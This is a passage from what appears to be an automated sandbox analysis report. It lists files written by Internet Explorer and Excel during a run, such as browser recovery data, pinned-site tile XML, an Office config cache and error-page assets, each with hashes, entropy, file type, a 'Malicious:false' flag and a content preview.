                                                                                                                                                                SSDEEP:96:rCZpQp6nBS/jp2xWmMGiUg3DTDp75ksg3DTDp7FCA:rCZpQp6nk/jp2xWmMGxYzp75lYzp7kA
                                                                                                                                                                MD5:A8EF5B0FD756BE9A78CFC806E96CE89C
                                                                                                                                                                SHA1:9296E6BB2974CE1A339E0AE36ED537F91A59D0EB
                                                                                                                                                                SHA-256:308836901656334D15ADA144BC333223C8AC95AA5C861BE928C961160EC83F77
                                                                                                                                                                SHA-512:45ED4601AC2859B1992EC7AF17ABCDB4370C62BEB17A21FD32FA9BEF0233DB593D1297E7CA25EFABEE74D6F2D80A1F47DE6A525A93582A88AAE73B992FBC581E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):27588
                                                                                                                                                                Entropy (8bit):1.914931709058199
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rSZTVQR63kDjd2FWlM5VLMPKV5BFVLMPKV5YsA:rO+s0PUcmHL8KVLL8KVWH
                                                                                                                                                                MD5:EC0378B9FD41FFC29F2D39AB7457E30B
                                                                                                                                                                SHA1:4699E57B1EEEC0AC8C39CFC52AF428F9379F9E6F
                                                                                                                                                                SHA-256:BFAF1575FBDA07B353E1A828C018FC9B5EE9A3F083B21222E653C97BB96B8111
                                                                                                                                                                SHA-512:30AE3D2843D90FBE25749603C668503A3530942D6BBAAA066D2232FC9130B49C7DF3A47F9B9BFB4BE5AF7BE25CE3D135E527EE8FB5173836169308C5DED63B0F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C1F50A29-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):28144
                                                                                                                                                                Entropy (8bit):1.9207168531889898
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rnZIQA6ak+jV2ZWJMlZ0cHXGT10c1cHX9A:rZxrz4MISHnHWJn6H+
                                                                                                                                                                MD5:54F420FC6D17AFC3213AC8178D548349
                                                                                                                                                                SHA1:D9931600D39445431E50841406AD061FC2649C44
                                                                                                                                                                SHA-256:429B50DBA0BF58729F62240F0A6F07980A4399B6AB4715DAD8E7D0DFA9BF448F
                                                                                                                                                                SHA-512:79D5F396F0B3A4AE0CCC48E3D47AF50D0E1FDF6980DFA1E8C532E86F878C9A0189055EA508318599D994FA7BB4EE9E3F6DB682D39CF8A6AB1D6858073B3F73F2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CFEFB1DE-CAAD-11EB-90E4-ECF4BB862DED}.dat
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:Microsoft Word Document
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):27592
                                                                                                                                                                Entropy (8bit):1.918492100727991
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:ruZtQsA6WUBSTlbjh2USWYMQBc4UOolc4UOZA:ruZtQ16LkT1jh2ZWYMQBcROolcROZA
                                                                                                                                                                MD5:79D56166307B15993F3386A3A638376C
                                                                                                                                                                SHA1:A91AD9DAF8050BFFAFE18622F144902233ADFCA7
                                                                                                                                                                SHA-256:4A7A62EAF46954B9853038B0A7ACF3F68EF90704C589472AB9E41E7477286AF1
                                                                                                                                                                SHA-512:C9829231BEAEBE5C3A4B4529EE04D15EBE445BFB83F73829AD37C5EEA5F468397F1C7A9947ACCE9494B277FE57082A688E2028B08F86B949F28B00E46930B074
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.117856519163228
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxOEV3N3TnWimI002EtM3MHdNMNxOEV3N3TnWimI00ObVbkEtMb:2d6NxOU3N3TSZHKd6NxOU3N3TSZ76b
                                                                                                                                                                MD5:621EB656303E8270283EABFCF11F9854
                                                                                                                                                                SHA1:6526C70DE9143018456B6CA4EA35E4F0B8CA88E4
                                                                                                                                                                SHA-256:2920B7AC67CC5F1B544077642FABBC14C8D88CAD1BD0A90D623CC2A208A78500
                                                                                                                                                                SHA-512:8667901B40741E1CB1143A4F298437D50356DDB7A26EAFD255A95EF79FACC14569142544A3EA2EC613C23372F9A06632A146DA188DE96B0FEF95178C027A8892
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653
                                                                                                                                                                Entropy (8bit):5.106728622068366
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxe2kZnWimI002EtM3MHdNMNxe2kZnWimI00Obkak6EtMb:2d6NxroSZHKd6NxroSZ7Aa7b
                                                                                                                                                                MD5:D6A6DE7380D449E1E193FF1F7B3F8F9F
                                                                                                                                                                SHA1:28EC605B64FA91700DA2E8E2257AAE98465F5B93
                                                                                                                                                                SHA-256:3D41E628656CE87C4774567A257251E1322DC8CFF7DE8A0A140A62064F77F248
                                                                                                                                                                SHA-512:338E693D50BC2A8C7AACE28A54C5B0AF3D42B46E61657EEE73515D8911A44C0A2328AC171D2A176BA6073B04C65DE482BC8ABDF170B6D5764955FBCF0B4DB18C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6fb5d6c8,0x01d75eba</date><accdate>0x6fb5d6c8,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x6fb5d6c8,0x01d75eba</date><accdate>0x6fb5d6c8,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):662
                                                                                                                                                                Entropy (8bit):5.136788640295428
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxvLV3N3TnWimI002EtM3MHdNMNxvLV3N3TnWimI00ObmZEtMb:2d6Nxvh3N3TSZHKd6Nxvh3N3TSZ7mb
                                                                                                                                                                MD5:4E4D5498C4A16D70F8920545C723D39D
                                                                                                                                                                SHA1:756FF5CD5B439C6E57A88C95FBD37FFB47355792
                                                                                                                                                                SHA-256:36132C63143D2A8EAC3A102D3856FB549FC7CB84E93135EED3BF4F7DAEE8FD1C
                                                                                                                                                                SHA-512:1C3C5C2485993969B33E5B446A1F054F2D62BF1A722C3D25D86C48A707A67E3F29D8F9F20B0DB5D4FE48188240259B098AB70A351A9C893D734BC7776D8A699C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):647
                                                                                                                                                                Entropy (8bit):5.065918622800244
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxia/mnWimI002EtM3MHdNMNxia/mnWimI00Obd5EtMb:2d6NxkSZHKd6NxkSZ7Jjb
                                                                                                                                                                MD5:6246BDE7DF4FCDA0BC7048B74C14155A
                                                                                                                                                                SHA1:68619801854D035811ECC95366232E86F88EC39E
                                                                                                                                                                SHA-256:963EF10FA72C3FD1FA97E84ACB35B2036F2D85831120F4CB0DD8FE0F35E3269C
                                                                                                                                                                SHA-512:4D2233773E3F2D8100CE87924E1F955D5241FE8201D70D8BBD3160D35B40D76D7EF1C4F0D5C860086CB40379CF755EBE2E4544F67E9413F1BB2D48A01A9EE629
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.1489570187121005
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxhGwV3N3TnWimI002EtM3MHdNMNxhGwV3N3TnWimI00Ob8K075EtMb:2d6NxQ43N3TSZHKd6NxQ43N3TSZ7YKa/
                                                                                                                                                                MD5:29E6A94B721E07C691157F21C9DDC9F4
                                                                                                                                                                SHA1:AAF5D22B8460AE65FAE6951CCE474BAAA78FD749
                                                                                                                                                                SHA-256:80270DA4EA34E2D6AAC9B78EFDFDB551E6293BE93399D57D8D14170D778CAC40
                                                                                                                                                                SHA-512:FD749B504705AD499681166CF3DABCC6A2D10BA22A23644D71A2DFA76151DE8DE0F1927F7D527D2F19CDD524A63B46DF9D62D983F9DDC311EC537EB44D152F92
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653
                                                                                                                                                                Entropy (8bit):5.049251456889828
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNx0na/mnWimI002EtM3MHdNMNx0na/mnWimI00ObxEtMb:2d6Nx0fSZHKd6Nx0fSZ7nb
                                                                                                                                                                MD5:AF79916588ECEB8DE2F37596B5CFD9AB
                                                                                                                                                                SHA1:1ED4FEC5493E4A9DA9C5D24EE37B9624279DCC9B
                                                                                                                                                                SHA-256:559328BE63BF10D7AF274EA7D37BC7A4C944431F4875F85289AD9ACFC9BDAA67
                                                                                                                                                                SHA-512:3C3505ADC49063B24B2DFAA73D5FF73491F0549C4C97CDB260A55EAAD0411DCE42B9584C864B9C49427C2D79CC9CCC50C938CF6AD265A0D31CA999158063F0EC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):656
                                                                                                                                                                Entropy (8bit):5.09118941820664
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxxa/mnWimI002EtM3MHdNMNxxa/mnWimI00Ob6Kq5EtMb:2d6NxZSZHKd6NxZSZ7ob
                                                                                                                                                                MD5:7444DAD90865D1C0D12325E671E68B5B
                                                                                                                                                                SHA1:66017F5494B746FFB2AF7DBDC1A7E0740C24B910
                                                                                                                                                                SHA-256:0C9E37AEB53CA36742B577455DCABC2E7284C0C851C080C4091CD48C97E40847
                                                                                                                                                                SHA-512:C0F9E91597E6867C0BE986362EC2AED8F3DBA83125007B91C0096DBCC8E04843E98B37643A1CF34DFF7DBEC7F26EDCEDE4EEA65EDF8C9914F4C8337D09624274
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):659
                                                                                                                                                                Entropy (8bit):5.061859989595668
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxca/mnWimI002EtM3MHdNMNxca/mnWimI00ObVEtMb:2d6NxeSZHKd6NxeSZ7Db
                                                                                                                                                                MD5:8FEE54DFA3411F625D8ED1E88EC514B9
                                                                                                                                                                SHA1:E67044B5420D89F9A7066CB99DDDC02EAEB8C8EA
                                                                                                                                                                SHA-256:8D26BD1C0E10A05AC2DEFB0654DEC4823E77C5C9CC771A1D85C70BC71BDCCE28
                                                                                                                                                                SHA-512:9C67F8E18AF4E9CA8A4F8A18DE74ADC4B62663300BCDD95211128DECB38B9F41BB3CB7C3468DD517A3948E447CAFF6138231F470D246EF336C7A0E6F96C49388
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):653
                                                                                                                                                                Entropy (8bit):5.0519975493291644
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:TMHdNMNxfna/mnWimI002EtM3MHdNMNxfna/mnWimI00Obe5EtMb:2d6NxHSZHKd6NxHSZ7ijb
                                                                                                                                                                MD5:128F29080C333A45A539BB3555A98792
                                                                                                                                                                SHA1:A6EEE2AF178F339D9985D675700BEA704B88E3C2
                                                                                                                                                                SHA-256:A0292B34ED728A07A85BD8E9E89453E4B21E2FEAC851E464E4B2198E60F26E7A
                                                                                                                                                                SHA-512:4746191CA63D7BDF4FB5C36C7416EDF4A89F648C40A5119F5F0954FF8455E33F74B97F77909CEB5DDAC903B6178775090A4419EA5C920930A94E6C149FB72E56
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D18DB67F-C32A-4E79-9062-0C1A4F78D8FB
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):134922
                                                                                                                                                                Entropy (8bit):5.369112384074001
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:9cQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:pEQ9DQW+ziXOe
                                                                                                                                                                MD5:202418F344CB882FA00BA969D15999F0
                                                                                                                                                                SHA1:EA73964E25E6372D218265C44B6CBC7D80089119
                                                                                                                                                                SHA-256:869B61ACF54ECE951CDDD4378AF8E500E09BBD7DBAC458EBD1E5041F7F32D612
                                                                                                                                                                SHA-512:FFCE0AFACCCD2F8B5C0E71268BDE9E871241AE2EDC38863121F22EDFC6274885D8B1E33010BA323609E27483EADE93AE25EFC96485F0B0F5FEEAE3A229DB35F2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-11T03:06:37">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DFF046B8.png
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:PNG image data, 1038 x 657, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):82182
                                                                                                                                                                Entropy (8bit):7.937734438427685
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:BlthHGaFc1QdzhAVSrTINQzmxUF55taYxfvrnlljQ/9o3CNdaU3OLP:rRd9AY3yQzmq55HxfznllWA6dROLP
                                                                                                                                                                MD5:65F572544B616B7638EFC2A0DEE5EF2D
                                                                                                                                                                SHA1:26964C665C300FFAEF2D77CC455C305B014B149A
                                                                                                                                                                SHA-256:EFDE5EAA221B569C35140B384FC762AC48EA5EFE7F6EF8CF228448A8A6D18E4E
                                                                                                                                                                SHA-512:76B36C6BFF20B9E32471E8F6FD72E800C11DC0CDA47E3A59F3B792A1E5DBFC3CD5977AE9A3CE60E6AFEBAEAED1E82651C0FC513B98A62980744E709A3F008F2D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR..............>......sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^.........wYzQ...H.R.. ..hb'$.......b..Gc..5.a..(.."..T....]...>g..={..wn........S..;.s.d.E..........Z.+.........X.(.999.l.r.;w..5K.././..7.]...D../-Z...;.G.)....n....u.yS......UN....i.-2{.l.1c..7OV.Xa.!..{.n......),,...9.2jI..R.^=i....>r.a..A.....8"""""........X.p..9S..n.,Z.P.]+.7o..;w.@Aff..UK222.....h@a...25..<.L9..E..f<.....Qe...Q..=.t.R......o..9s.~2....4X..p....@.....<.@....~..DDDDDT.0p@.#??_._/.O...&.I_.5k.gu..)........j.m..y..a~........?.0..[.~a.......U.....Q$;v....+o.....?^6n.XR.W8l0.5..wA.Z.R.n].g.....4l...C...N.uKd.&yy..._P.H.....A....>..nC3.......2`...q..y.W.....u.L....A-...K...!.."..|P.}Gi......)..,`:.(.}....'.,XP.W...MP..I.j......~..yK!""""".x...E.0.4i.....2u.T...a..Z...w...-[..!.q...G....y.".'...LAa..\!//."..N..y...6m....k.N...*...y.$""""".x..P..G).....mY.p.dgg....@...:u.^.z..G.mj..i..<R.5...c.....o.....|..g.Y3....
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\ErrorPageTemplate[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
